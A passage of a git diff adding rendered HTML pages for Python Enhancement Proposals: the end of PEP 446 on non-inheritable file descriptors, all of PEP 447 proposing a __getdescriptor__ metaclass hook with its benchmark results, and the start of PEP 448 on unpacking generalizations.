  • Squid Bug #837033: +Squid should set CLOEXEC on opened FDs. “32k+ close() calls in each +child process take a long time ([12-56] seconds) in Xen PV guests.”
  • +
+
+
+
+

Proposal

+
+

Non-inheritable File Descriptors

+

The following functions are modified to make newly created file +descriptors non-inheritable by default:

+
    +
  • asyncore.dispatcher.create_socket()
  • +
  • io.FileIO
  • +
  • io.open()
  • +
  • open()
  • +
  • os.dup()
  • +
  • os.fdopen()
  • +
  • os.open()
  • +
  • os.openpty()
  • +
  • os.pipe()
  • +
  • select.devpoll()
  • +
  • select.epoll()
  • +
  • select.kqueue()
  • +
  • socket.socket()
  • +
  • socket.socket.accept()
  • +
  • socket.socket.dup()
  • +
  • socket.socket.fromfd()
  • +
  • socket.socketpair()
  • +
+

os.dup2() still creates inheritable file descriptors by default; see below.

+

When available, atomic flags are used to make file descriptors +non-inheritable. The atomicity is not guaranteed because a fallback is +required when atomic flags are not available.

+
+
+

New Functions And Methods

+

New functions available on all platforms:

+
    +
  • os.get_inheritable(fd: int): return True if the file +descriptor can be inherited by child processes, False otherwise.
  • +
  • os.set_inheritable(fd: int, inheritable: bool): set the +inheritable flag of the specified file descriptor.
  • +
+

New functions only available on Windows:

+
    +
  • os.get_handle_inheritable(handle: int): return True if the +handle can be inherited by child processes, False otherwise.
  • +
  • os.set_handle_inheritable(handle: int, inheritable: bool): +set the inheritable flag of the specified handle.
  • +
+

New methods:

+
    +
  • socket.socket.get_inheritable(): return True if the +socket can be inherited by child processes, False otherwise.
  • +
  • socket.socket.set_inheritable(inheritable: bool): +set the inheritable flag of the specified socket.
  • +
+
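A brief usage sketch of the functions and methods listed above (Python 3.4 and later):

import os
import socket

r, w = os.pipe()                 # non-inheritable by default (this PEP)
print(os.get_inheritable(r))     # False
os.set_inheritable(r, True)      # opt a descriptor back in explicitly
print(os.get_inheritable(r))     # True

s = socket.socket()
print(s.get_inheritable())       # False
s.set_inheritable(True)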
+
+

Other Changes

+

On UNIX, subprocess makes file descriptors of the pass_fds parameter +inheritable. The file descriptor is made inheritable in the child +process after the fork() and before execv(), so the inheritable +flag of file descriptors is unchanged in the parent process.
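A minimal UNIX-only sketch of this behaviour:

import os
import subprocess
import sys

r, w = os.pipe()                        # both ends non-inheritable
proc = subprocess.Popen(
    [sys.executable, "-c",
     "import os, sys; print(os.read(int(sys.argv[1]), 5))", str(r)],
    pass_fds=(r,),                      # made inheritable in the child only
)
os.write(w, b"hello")
os.close(w)
proc.wait()
print(os.get_inheritable(r))            # still False in the parent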

+

os.dup2() has a new optional inheritable parameter: os.dup2(fd, +fd2, inheritable=True). fd2 is created inheritable by default, but +non-inheritable if inheritable is False.

+

os.dup2() behaves differently than os.dup() because the most +common use case of os.dup2() is to replace the file descriptors of +the standard streams: stdin (0), stdout (1) and +stderr (2). Standard streams are expected to be inherited by +child processes.
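A sketch of the resulting behaviour:

import os

saved = os.dup(1)                # keep a copy of the real stdout
r, w = os.pipe()
os.dup2(w, 1)                    # inheritable=True is the default
inheritable = os.get_inheritable(1)
os.dup2(saved, 1)                # restore stdout
print(inheritable)               # True: fd 1 stayed inheritable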

+
+
+
+

Backward Compatibility

+

This PEP breaks applications that rely on the inheritance of file descriptors. Developers are encouraged to reuse the high-level Python module subprocess, which handles the inheritance of file descriptors in a portable way.

+

Applications using the subprocess module with the pass_fds +parameter or using only os.dup2() to redirect standard streams should +not be affected.

+

Python no longer conforms to POSIX, since file descriptors are now made non-inheritable by default. Python was not designed to conform to POSIX; it was designed to support developing portable applications.

+
+ +
+

Rejected Alternatives

+
+

Add a new open_noinherit() function

+

In June 2007, Henning von Bargen proposed on the python-dev mailing list +to add a new open_noinherit() function to fix issues of inherited file +descriptors in child processes. At this time, the default value of the +close_fds parameter of the subprocess module was False.

+

Read the mail thread: [Python-Dev] Proposal for a new function +“open_noinherit” to avoid problems with subprocesses and security risks.

+
+
+

PEP 433

+

PEP 433, “Easier suppression of file descriptor inheritance”, +was a previous attempt proposing various other alternatives, but no +consensus could be reached.

+
+
+
+

Python Issues

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0446.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0447/index.html b/pep-0447/index.html new file mode 100644 index 00000000000..0de3d15e6c1 --- /dev/null +++ b/pep-0447/index.html @@ -0,0 +1,804 @@ + + + + + + + + PEP 447 – Add __getdescriptor__ method to metaclass | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 447 – Add __getdescriptor__ method to metaclass

+
+
Author:
+
Ronald Oussoren <ronaldoussoren at mac.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
12-Jun-2013
+
Post-History:
+
02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently object.__getattribute__ and super.__getattribute__ peek +in the __dict__ of classes on the MRO for a class when looking for +an attribute. This PEP adds an optional __getdescriptor__ method to +a metaclass that replaces this behavior and gives more control over attribute +lookup, especially when using a super object.

+

That is, the MRO walking loop in _PyType_Lookup and +super.__getattribute__ gets changed from:

+
def lookup(mro_list, name):
+    for cls in mro_list:
+        if name in cls.__dict__:
+            return cls.__dict__[name]
+
+    return NotFound
+
+
+

to:

+
def lookup(mro_list, name):
+    for cls in mro_list:
+        try:
+            return cls.__getdescriptor__(name)
+        except AttributeError:
+            pass
+
+    return NotFound
+
+
+

The default implementation of __getdescriptor__ looks in the class +dictionary:

+
class type:
+   def __getdescriptor__(cls, name):
+       try:
+           return cls.__dict__[name]
+       except KeyError:
+           raise AttributeError(name) from None
+
+
+
+
+

PEP Status

+

This PEP is deferred until someone has time to update this PEP and push it forward.

+
+
+

Rationale

+

It is currently not possible to influence how the super class looks +up attributes (that is, super.__getattribute__ unconditionally +peeks in the class __dict__), and that can be problematic for +dynamic classes that can grow new methods on demand, for example dynamic +proxy classes.

+

The __getdescriptor__ method makes it possible to dynamically add +attributes even when looking them up using the super class.

+

The new method affects object.__getattribute__ (and +PyObject_GenericGetAttr) as well for consistency and to have a single +place to implement dynamic attribute resolution for classes.

+
+

Background

+

The current behavior of super.__getattribute__ causes problems for +classes that are dynamic proxies for other (non-Python) classes or types, +an example of which is PyObjC. PyObjC creates a Python class for every +class in the Objective-C runtime, and looks up methods in the Objective-C +runtime when they are used. This works fine for normal access, but doesn’t +work for access with super objects. Because of this PyObjC currently +includes a custom super that must be used with its classes, as well as +completely reimplementing PyObject_GenericGetAttr for normal attribute +access.

+

The API in this PEP makes it possible to remove the custom super and +simplifies the implementation because the custom lookup behavior can be +added in a central location.

+
+

Note

+

PyObjC cannot precalculate the contents of the class __dict__ because Objective-C classes can grow new methods at runtime. Furthermore, Objective-C classes tend to contain many methods while most Python code will only use a small subset of them; this makes precalculating unnecessarily expensive.

+
+
+
+
+

The superclass attribute lookup hook

+

Both super.__getattribute__ and object.__getattribute__ (or +PyObject_GenericGetAttr and in particular _PyType_Lookup in C code) +walk an object’s MRO and currently peek in the class’ __dict__ to look up +attributes.

+

With this proposal both lookup methods no longer peek in the class __dict__ but call the special method __getdescriptor__, which is a slot defined on the metaclass. The default implementation of that method looks up the name in the class __dict__, which means that attribute lookup is unchanged unless a metatype actually defines the new special method.

+
+

Aside: Attribute resolution algorithm in Python

+

The attribute resolution process as implemented by object.__getattribute__ +(or PyObject_GenericGetAttr in CPython’s implementation) is fairly +straightforward, but not entirely so without reading C code.

+

The current CPython implementation of object.__getattribute__ is basically +equivalent to the following (pseudo-) Python code (excluding some house +keeping and speed tricks):

+
def _PyType_Lookup(tp, name):
+    mro = tp.mro()
+    assert isinstance(mro, tuple)
+
+    for base in mro:
+       assert isinstance(base, type)
+
+       # PEP 447 will change these lines:
+       try:
+           return base.__dict__[name]
+       except KeyError:
+           pass
+
+    return None
+
+
+class object:
+    def __getattribute__(self, name):
+        assert isinstance(name, str)
+
+        tp = type(self)
+        descr = _PyType_Lookup(tp, name)
+
+        f = None
+        if descr is not None:
+            f = descr.__get__
+            if f is not None and descr.__set__ is not None:
+                # Data descriptor
+                return f(descr, self, type(self))
+
+        dict = self.__dict__
+        if dict is not None:
+            try:
+                return self.__dict__[name]
+            except KeyError:
+                pass
+
+        if f is not None:
+            # Non-data descriptor
+            return f(descr, self, type(self))
+
+        if descr is not None:
+            # Regular class attribute
+            return descr
+
+        raise AttributeError(name)
+
+
+class super:
+    def __getattribute__(self, name):
+       assert isinstance(name, str)
+
+       if name != '__class__':
+           starttype = self.__self_type__
+           mro = starttype.mro()
+
+           try:
+               idx = mro.index(self.__thisclass__)
+
+           except ValueError:
+               pass
+
+           else:
+               for base in mro[idx+1:]:
+                   # PEP 447 will change these lines:
+                   try:
+                       descr = base.__dict__[name]
+                   except KeyError:
+                       continue
+
+                   f = descr.__get__
+                   if f is not None:
+                       return f(descr,
+                           None if (self.__self__ is self.__self_type__) else self.__self__,
+                           starttype)
+
+                   else:
+                       return descr
+
+       return object.__getattribute__(self, name)
+
+
+

This PEP changes the dict lookup at the lines starting at “# PEP 447” into a method call that performs the actual lookup, making it possible to affect that lookup both for normal attribute access and for access through the super proxy.

+

Note that specific classes can already completely override the default +behaviour by implementing their own __getattribute__ slot (with or without +calling the super class implementation).

+
+
+

In Python code

+

A meta type can define a method __getdescriptor__ that is called during attribute resolution by both super.__getattribute__ and object.__getattribute__:

+
class MetaType(type):
+    def __getdescriptor__(cls, name):
+        try:
+            return cls.__dict__[name]
+        except KeyError:
+            raise AttributeError(name) from None
+
+
+

The __getdescriptor__ method has as its arguments a class (which is an +instance of the meta type) and the name of the attribute that is looked up. +It should return the value of the attribute without invoking descriptors, +and should raise AttributeError when the name cannot be found.

+

The type class provides a default implementation for __getdescriptor__, +that looks up the name in the class dictionary.

+
+

Example usage

+

The code below implements a silly metaclass that redirects attribute lookup to +uppercase versions of names:

+
class UpperCaseAccess (type):
+    def __getdescriptor__(cls, name):
+        try:
+            return cls.__dict__[name.upper()]
+        except KeyError:
+            raise AttributeError(name) from None
+
+class SillyObject (metaclass=UpperCaseAccess):
+    def m(self):
+        return 42
+
+    def M(self):
+        return "fortytwo"
+
+obj = SillyObject()
+assert obj.m() == "fortytwo"
+
+
+

As mentioned earlier in this PEP a more realistic use case of this +functionality is a __getdescriptor__ method that dynamically populates the +class __dict__ based on attribute access, primarily when it is not +possible to reliably keep the class dict in sync with its source, for example +because the source used to populate __dict__ is dynamic as well and does +not have triggers that can be used to detect changes to that source.

+

An example of that are the class bridges in PyObjC: the class bridge is a +Python object (class) that represents an Objective-C class and conceptually +has a Python method for every Objective-C method in the Objective-C class. +As with Python it is possible to add new methods to an Objective-C class, or +replace existing ones, and there are no callbacks that can be used to detect +this.

+
+
+
+

In C code

+

A new type flag Py_TPFLAGS_GETDESCRIPTOR with value (1UL << 11) indicates that the new slot is present and is to be used.

+

A new slot tp_getdescriptor is added to the PyTypeObject struct, this +slot corresponds to the __getdescriptor__ method on type.

+

The slot has the following prototype:

+
PyObject* (*getdescriptorfunc)(PyTypeObject* cls, PyObject* name);
+
+
+

This method should look up name in the namespace of cls, without looking at superclasses, and should not invoke descriptors. The method returns NULL without setting an exception when the name cannot be found, and returns a new reference otherwise (not a borrowed reference).

+

Classes with a tp_getdescriptor slot must add Py_TPFLAGS_GETDESCRIPTOR to tp_flags to indicate that the new slot must be used.

+
+
+

Use of this hook by the interpreter

+

The new method is required for metatypes and as such is defined on type. Both super.__getattribute__ and object.__getattribute__/PyObject_GenericGetAttr (through _PyType_Lookup) use this __getdescriptor__ method when walking the MRO.

+
+
+

Other changes to the implementation

+

The change for PyObject_GenericGetAttr will be done by changing the private function _PyType_Lookup. This currently returns a borrowed reference, but must return a new reference when the __getdescriptor__ method is present. Because of this, _PyType_Lookup will be renamed to _PyType_LookupName; this will cause compile-time errors for all out-of-tree users of this private API.

+

For the same reason _PyType_LookupId is renamed to _PyType_LookupId2. +A number of other functions in typeobject.c with the same issue do not get +an updated name because they are private to that file.

+

The attribute lookup cache in Objects/typeobject.c is disabled for classes +that have a metaclass that overrides __getdescriptor__, because using the +cache might not be valid for such classes.

+
+
+
+

Impact of this PEP on introspection

+

Use of the method introduced in this PEP can affect introspection of classes +with a metaclass that uses a custom __getdescriptor__ method. This section +lists those changes.

+

The items listed below are only affected by custom __getdescriptor__ methods; the default implementation for object won’t cause problems because it still only uses the class __dict__ and won’t cause visible changes to the behaviour of object.__getattribute__.

+
    +
  • dir might not show all attributes

    As with a custom __getattribute__ method dir() might not see all +(instance) attributes when using the __getdescriptor__() method to +dynamically resolve attributes.

    +

    The solution for that is quite simple: classes using __getdescriptor__ should also implement __dir__() if they want full support for the builtin dir() function (see the sketch after this list).

    +
  • +
  • inspect.getattr_static might not show all attributes

    The function inspect.getattr_static intentionally does not invoke __getattribute__ and descriptors, to avoid invoking user code during introspection with this function. The __getdescriptor__ method will also be ignored, and is another way in which the result of inspect.getattr_static can differ from that of the builtin getattr.

    +
  • +
  • inspect.getmembers and inspect.classify_class_attrs

    Both of these functions directly access the class __dict__ of classes along +the MRO, and hence can be affected by a custom __getdescriptor__ method.

    +

    Code with a custom __getdescriptor__ method that wants to play nice with these functions also needs to ensure that the __dict__ is set up correctly when it is accessed directly by Python code.

    +

    Note that inspect.getmembers is used by pydoc and hence this can +affect runtime documentation introspection.

    +
  • +
  • Direct introspection of the class __dict__

    Any code that directly accesses the class __dict__ for introspection can be affected by a custom __getdescriptor__ method; see the previous item.

    +
  • +
+
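A sketch of that pairing, extending the UpperCaseAccess example from earlier (the __getdescriptor__ hook is only honoured once this PEP is implemented; the __dir__ part already works on current CPython):

class UpperCaseAccess(type):
    def __getdescriptor__(cls, name):
        # Proposed hook from this PEP: resolve lowercase names to
        # uppercase entries in the class __dict__.
        try:
            return cls.__dict__[name.upper()]
        except KeyError:
            raise AttributeError(name) from None

    def __dir__(cls):
        # Advertise the lowercase aliases that __getdescriptor__ would
        # resolve, keeping dir() consistent with attribute access.
        names = set(super().__dir__())
        names.update(n.lower() for n in cls.__dict__ if n.isupper())
        return sorted(names)

class SillyObject(metaclass=UpperCaseAccess):
    def M(self):
        return "fortytwo"

assert "m" in dir(SillyObject)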
+
+

Performance impact

+

WARNING: The benchmark results in this section are old, and will be updated +when I’ve ported the patch to the current trunk. I don’t expect significant +changes to the results in this section.

+
+

Micro benchmarks

+

Issue 18181 has a micro benchmark as one of its attachments +(pep447-micro-bench.py) that specifically tests the speed of attribute +lookup, both directly and through super.

+

Note that attribute lookup with deep class hierarchies is significantly slower when using a custom __getdescriptor__ method. This is because the attribute lookup cache for CPython cannot be used when this method is defined.

+
+
+

Pybench

+

The pybench output below compares an implementation of this PEP with the +regular source tree, both based on changeset a5681f50bae2, run on an idle +machine and Core i7 processor running Centos 6.4.

+

Even though the machine was idle there were clear differences between runs; I’ve seen the difference in “minimum time” vary from -0.1% to +1.5%, with similar (but slightly smaller) differences in the “average time”.

+
-------------------------------------------------------------------------------
+PYBENCH 2.1
+-------------------------------------------------------------------------------
+* using CPython 3.4.0a0 (default, Jul 29 2013, 13:01:34) [GCC 4.4.7 20120313 (Red Hat 4.4.7-3)]
+* disabled garbage collection
+* system check interval set to maximum: 2147483647
+* using timer: time.perf_counter
+* timer: resolution=1e-09, implementation=clock_gettime(CLOCK_MONOTONIC)
+
+-------------------------------------------------------------------------------
+Benchmark: pep447.pybench
+-------------------------------------------------------------------------------
+
+    Rounds: 10
+    Warp:   10
+    Timer:  time.perf_counter
+
+    Machine Details:
+       Platform ID:    Linux-2.6.32-358.114.1.openstack.el6.x86_64-x86_64-with-centos-6.4-Final
+       Processor:      x86_64
+
+    Python:
+       Implementation: CPython
+       Executable:     /tmp/default-pep447/bin/python3
+       Version:        3.4.0a0
+       Compiler:       GCC 4.4.7 20120313 (Red Hat 4.4.7-3)
+       Bits:           64bit
+       Build:          Jul 29 2013 14:09:12 (#default)
+       Unicode:        UCS4
+
+
+-------------------------------------------------------------------------------
+Comparing with: default.pybench
+-------------------------------------------------------------------------------
+
+    Rounds: 10
+    Warp:   10
+    Timer:  time.perf_counter
+
+    Machine Details:
+       Platform ID:    Linux-2.6.32-358.114.1.openstack.el6.x86_64-x86_64-with-centos-6.4-Final
+       Processor:      x86_64
+
+    Python:
+       Implementation: CPython
+       Executable:     /tmp/default/bin/python3
+       Version:        3.4.0a0
+       Compiler:       GCC 4.4.7 20120313 (Red Hat 4.4.7-3)
+       Bits:           64bit
+       Build:          Jul 29 2013 13:01:34 (#default)
+       Unicode:        UCS4
+
+
+Test                             minimum run-time        average  run-time
+                                 this    other   diff    this    other   diff
+-------------------------------------------------------------------------------
+          BuiltinFunctionCalls:    45ms    44ms   +1.3%    45ms    44ms   +1.3%
+           BuiltinMethodLookup:    26ms    27ms   -2.4%    27ms    27ms   -2.2%
+                 CompareFloats:    33ms    34ms   -0.7%    33ms    34ms   -1.1%
+         CompareFloatsIntegers:    66ms    67ms   -0.9%    66ms    67ms   -0.8%
+               CompareIntegers:    51ms    50ms   +0.9%    51ms    50ms   +0.8%
+        CompareInternedStrings:    34ms    33ms   +0.4%    34ms    34ms   -0.4%
+                  CompareLongs:    29ms    29ms   -0.1%    29ms    29ms   -0.0%
+                CompareStrings:    43ms    44ms   -1.8%    44ms    44ms   -1.8%
+    ComplexPythonFunctionCalls:    44ms    42ms   +3.9%    44ms    42ms   +4.1%
+                 ConcatStrings:    33ms    33ms   -0.4%    33ms    33ms   -1.0%
+               CreateInstances:    47ms    48ms   -2.9%    47ms    49ms   -3.4%
+            CreateNewInstances:    35ms    36ms   -2.5%    36ms    36ms   -2.5%
+       CreateStringsWithConcat:    69ms    70ms   -0.7%    69ms    70ms   -0.9%
+                  DictCreation:    52ms    50ms   +3.1%    52ms    50ms   +3.0%
+             DictWithFloatKeys:    40ms    44ms  -10.1%    43ms    45ms   -5.8%
+           DictWithIntegerKeys:    32ms    36ms  -11.2%    35ms    37ms   -4.6%
+            DictWithStringKeys:    29ms    34ms  -15.7%    35ms    40ms  -11.0%
+                      ForLoops:    30ms    29ms   +2.2%    30ms    29ms   +2.2%
+                    IfThenElse:    38ms    41ms   -6.7%    38ms    41ms   -6.9%
+                   ListSlicing:    36ms    36ms   -0.7%    36ms    37ms   -1.3%
+                NestedForLoops:    43ms    45ms   -3.1%    43ms    45ms   -3.2%
+      NestedListComprehensions:    39ms    40ms   -1.7%    39ms    40ms   -2.1%
+          NormalClassAttribute:    86ms    82ms   +5.1%    86ms    82ms   +5.0%
+       NormalInstanceAttribute:    42ms    42ms   +0.3%    42ms    42ms   +0.0%
+           PythonFunctionCalls:    39ms    38ms   +3.5%    39ms    38ms   +2.8%
+             PythonMethodCalls:    51ms    49ms   +3.0%    51ms    50ms   +2.8%
+                     Recursion:    67ms    68ms   -1.4%    67ms    68ms   -1.4%
+                  SecondImport:    41ms    36ms  +12.5%    41ms    36ms  +12.6%
+           SecondPackageImport:    45ms    40ms  +13.1%    45ms    40ms  +13.2%
+         SecondSubmoduleImport:    92ms    95ms   -2.4%    95ms    98ms   -3.6%
+       SimpleComplexArithmetic:    28ms    28ms   -0.1%    28ms    28ms   -0.2%
+        SimpleDictManipulation:    57ms    57ms   -1.0%    57ms    58ms   -1.0%
+         SimpleFloatArithmetic:    29ms    28ms   +4.7%    29ms    28ms   +4.9%
+      SimpleIntFloatArithmetic:    37ms    41ms   -8.5%    37ms    41ms   -8.7%
+       SimpleIntegerArithmetic:    37ms    41ms   -9.4%    37ms    42ms  -10.2%
+      SimpleListComprehensions:    33ms    33ms   -1.9%    33ms    34ms   -2.9%
+        SimpleListManipulation:    28ms    30ms   -4.3%    29ms    30ms   -4.1%
+          SimpleLongArithmetic:    26ms    26ms   +0.5%    26ms    26ms   +0.5%
+                    SmallLists:    40ms    40ms   +0.1%    40ms    40ms   +0.1%
+                   SmallTuples:    46ms    47ms   -2.4%    46ms    48ms   -3.0%
+         SpecialClassAttribute:   126ms   120ms   +4.7%   126ms   121ms   +4.4%
+      SpecialInstanceAttribute:    42ms    42ms   +0.6%    42ms    42ms   +0.8%
+                StringMappings:    94ms    91ms   +3.9%    94ms    91ms   +3.8%
+              StringPredicates:    48ms    49ms   -1.7%    48ms    49ms   -2.1%
+                 StringSlicing:    45ms    45ms   +1.4%    46ms    45ms   +1.5%
+                     TryExcept:    23ms    22ms   +4.9%    23ms    22ms   +4.8%
+                    TryFinally:    32ms    32ms   -0.1%    32ms    32ms   +0.1%
+                TryRaiseExcept:    17ms    17ms   +0.9%    17ms    17ms   +0.5%
+                  TupleSlicing:    49ms    48ms   +1.1%    49ms    49ms   +1.0%
+                   WithFinally:    48ms    47ms   +2.3%    48ms    47ms   +2.4%
+               WithRaiseExcept:    45ms    44ms   +0.8%    45ms    45ms   +0.5%
+-------------------------------------------------------------------------------
+Totals:                          2284ms  2287ms   -0.1%  2306ms  2308ms   -0.1%
+
+(this=pep447.pybench, other=default.pybench)
+
+
+

A run of the benchmark suite (with option “-b 2n3”) also seems to indicate that +the performance impact is minimal:

+
Report on Linux fangorn.local 2.6.32-358.114.1.openstack.el6.x86_64 #1 SMP Wed Jul 3 02:11:25 EDT 2013 x86_64 x86_64
+Total CPU cores: 8
+
+### call_method_slots ###
+Min: 0.304120 -> 0.282791: 1.08x faster
+Avg: 0.304394 -> 0.282906: 1.08x faster
+Significant (t=2329.92)
+Stddev: 0.00016 -> 0.00004: 4.1814x smaller
+
+### call_simple ###
+Min: 0.249268 -> 0.221175: 1.13x faster
+Avg: 0.249789 -> 0.221387: 1.13x faster
+Significant (t=2770.11)
+Stddev: 0.00012 -> 0.00013: 1.1101x larger
+
+### django_v2 ###
+Min: 0.632590 -> 0.601519: 1.05x faster
+Avg: 0.635085 -> 0.602653: 1.05x faster
+Significant (t=321.32)
+Stddev: 0.00087 -> 0.00051: 1.6933x smaller
+
+### fannkuch ###
+Min: 1.033181 -> 0.999779: 1.03x faster
+Avg: 1.036457 -> 1.001840: 1.03x faster
+Significant (t=260.31)
+Stddev: 0.00113 -> 0.00070: 1.6112x smaller
+
+### go ###
+Min: 0.526714 -> 0.544428: 1.03x slower
+Avg: 0.529649 -> 0.547626: 1.03x slower
+Significant (t=-93.32)
+Stddev: 0.00136 -> 0.00136: 1.0028x smaller
+
+### iterative_count ###
+Min: 0.109748 -> 0.116513: 1.06x slower
+Avg: 0.109816 -> 0.117202: 1.07x slower
+Significant (t=-357.08)
+Stddev: 0.00008 -> 0.00019: 2.3664x larger
+
+### json_dump_v2 ###
+Min: 2.554462 -> 2.609141: 1.02x slower
+Avg: 2.564472 -> 2.620013: 1.02x slower
+Significant (t=-76.93)
+Stddev: 0.00538 -> 0.00481: 1.1194x smaller
+
+### meteor_contest ###
+Min: 0.196336 -> 0.191925: 1.02x faster
+Avg: 0.196878 -> 0.192698: 1.02x faster
+Significant (t=61.86)
+Stddev: 0.00053 -> 0.00041: 1.2925x smaller
+
+### nbody ###
+Min: 0.228039 -> 0.235551: 1.03x slower
+Avg: 0.228857 -> 0.236052: 1.03x slower
+Significant (t=-54.15)
+Stddev: 0.00130 -> 0.00029: 4.4810x smaller
+
+### pathlib ###
+Min: 0.108501 -> 0.105339: 1.03x faster
+Avg: 0.109084 -> 0.105619: 1.03x faster
+Significant (t=311.08)
+Stddev: 0.00022 -> 0.00011: 1.9314x smaller
+
+### regex_effbot ###
+Min: 0.057905 -> 0.056447: 1.03x faster
+Avg: 0.058055 -> 0.056760: 1.02x faster
+Significant (t=79.22)
+Stddev: 0.00006 -> 0.00015: 2.7741x larger
+
+### silent_logging ###
+Min: 0.070810 -> 0.072436: 1.02x slower
+Avg: 0.070899 -> 0.072609: 1.02x slower
+Significant (t=-191.59)
+Stddev: 0.00004 -> 0.00008: 2.2640x larger
+
+### spectral_norm ###
+Min: 0.290255 -> 0.299286: 1.03x slower
+Avg: 0.290335 -> 0.299541: 1.03x slower
+Significant (t=-572.10)
+Stddev: 0.00005 -> 0.00015: 2.8547x larger
+
+### threaded_count ###
+Min: 0.107215 -> 0.115206: 1.07x slower
+Avg: 0.107488 -> 0.115996: 1.08x slower
+Significant (t=-109.39)
+Stddev: 0.00016 -> 0.00076: 4.8665x larger
+
+The following not significant results are hidden, use -v to show them:
+call_method, call_method_unknown, chaos, fastpickle, fastunpickle, float, formatted_logging, hexiom2, json_load, normal_startup, nqueens, pidigits, raytrace, regex_compile, regex_v8, richards, simple_logging, startup_nosite, telco, unpack_sequence.
+
+
+
+
+
+

Alternative proposals

+
+

__getattribute_super__

+

An earlier version of this PEP used the following static method on classes:

+
def __getattribute_super__(cls, name, object, owner): pass
+
+
+

This method performed name lookup as well as invoking descriptors and was +necessarily limited to working only with super.__getattribute__.

+
+
+

Reuse tp_getattro

+

It would be nice to avoid adding a new slot, thus keeping the API simpler and easier to understand. A comment on Issue 18181 asked about reusing the tp_getattro slot: that is, super could call the tp_getattro slot of all classes along the MRO.

+

That won’t work because tp_getattro will look in the instance __dict__ before it tries to resolve attributes using the classes in the MRO. This would mean that using tp_getattro instead of peeking in the class dictionaries changes the semantics of the super class.

+
+
+

Alternative placement of the new method

+

This PEP proposes to add __getdescriptor__ as a method on the metaclass. +An alternative would be to add it as a class method on the class itself +(similar to how __new__ is a staticmethod of the class and not a method +of the metaclass).

+

The advantage of using a method on the metaclass is that it will give an error when two classes on the MRO have different metaclasses that may have different behaviors for __getdescriptor__. With a normal classmethod that problem would pass undetected and might cause subtle errors when running the code.

+
+
+
+

History

+
    +
  • 23-Jul-2015: Added type flag Py_TPFLAGS_GETDESCRIPTOR after talking +with Guido.

    The new flag is primarily useful to avoid crashing when loading an extension +for an older version of CPython and could have positive speed implications +as well.

    +
  • +
  • Jul-2014: renamed slot to __getdescriptor__, the old name didn’t +match the naming style of other slots and was less descriptive.
  • +
+
+
+

Discussion threads

+ +
+
+

References

+
    +
  • Issue 18181 contains an out of date prototype implementation
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0447.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0448/index.html new file mode 100644 index 00000000000..7584e024346 --- /dev/null +++ b/pep-0448/index.html @@ -0,0 +1,342 @@ + PEP 448 – Additional Unpacking Generalizations | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 448 – Additional Unpacking Generalizations

+
+
Author:
+
Joshua Landau <joshua at landau.ws>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jun-2013
+
Python-Version:
+
3.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes extended usages of the * iterable unpacking operator and the ** dictionary unpacking operator to allow unpacking in more positions, an arbitrary number of times, and in function calls and displays.

+

Function calls are proposed to support an arbitrary number of +unpackings rather than just one:

+
>>> print(*[1], *[2], 3)
+1 2 3
+>>> dict(**{'x': 1}, y=2, **{'z': 3})
+{'x': 1, 'y': 2, 'z': 3}
+
+
+

Unpacking is proposed to be allowed inside tuple, list, set, +and dictionary displays:

+
>>> *range(4), 4
+(0, 1, 2, 3, 4)
+>>> [*range(4), 4]
+[0, 1, 2, 3, 4]
+>>> {*range(4), 4}
+{0, 1, 2, 3, 4}
+>>> {'x': 1, **{'y': 2}}
+{'x': 1, 'y': 2}
+
+
+

In dictionaries, later values will always override earlier ones:

+
>>> {'x': 1, **{'x': 2}}
+{'x': 2}
+
+>>> {**{'x': 2}, 'x': 1}
+{'x': 1}
+
+
+

This PEP does not include unpacking operators inside list, set and +dictionary comprehensions although this has not been ruled out for +future proposals.

+
+
+

Rationale

+

Current usage of the * iterable unpacking operator features +unnecessary restrictions that can harm readability.

+

Unpacking multiple times has an obvious rationale. When you want to unpack several iterables into a function call or follow an unpack with more positional arguments, the most natural way would be to write:

+
function(**kw_arguments, **more_arguments)
+
+function(*arguments, argument)
+
+
+

Simple examples where this is useful are print and str.format. +Instead, you could be forced to write:

+
kwargs = dict(kw_arguments)
+kwargs.update(more_arguments)
+function(**kwargs)
+
+args = list(arguments)
+args.append(argument)
+function(*args)
+
+
+

or, if you know to do so:

+
from collections import ChainMap
+function(**ChainMap(more_arguments, arguments))
+
+from itertools import chain
+function(*chain(arguments, [argument]))
+
+
+

which add unnecessary line-noise and, with the first methods, cause duplication of work.

+

There are two primary rationales for unpacking inside of containers. +Firstly there is a symmetry of assignment, where fst, *other, lst = +elems and elems = fst, *other, lst are approximate inverses, +ignoring the specifics of types. This, in effect, simplifies the +language by removing special cases.
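For example, with this PEP (Python 3.5 and later) the two directions look like:

>>> elems = [1, 2, 3, 4]
>>> fst, *other, lst = elems      # assignment unpacking (already legal)
>>> fst, other, lst
(1, [2, 3], 4)
>>> elems = fst, *other, lst      # the approximate inverse (this PEP)
>>> elems
(1, 2, 3, 4)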

+

Secondly, it vastly simplifies types of “addition” such as combining +dictionaries, and does so in an unambiguous and well-defined way:

+
combination = {**first_dictionary, "x": 1, "y": 2}
+
+
+

instead of:

+
combination = first_dictionary.copy()
+combination.update({"x": 1, "y": 2})
+
+
+

which is especially important in contexts where expressions are +preferred. This is also useful as a more readable way of summing +iterables into a list, such as my_list + list(my_tuple) + +list(my_range) which is now equivalent to just [*my_list, +*my_tuple, *my_range].

+
+
+

Specification

+

Function calls may accept an unbounded number of * and ** +unpackings. There will be no restriction of the order of positional +arguments with relation to * unpackings nor any restriction of the +order of keyword arguments with relation to ** unpackings.

+

Function calls continue to have the restriction that keyword arguments +must follow positional arguments and ** unpackings must additionally +follow * unpackings.

+

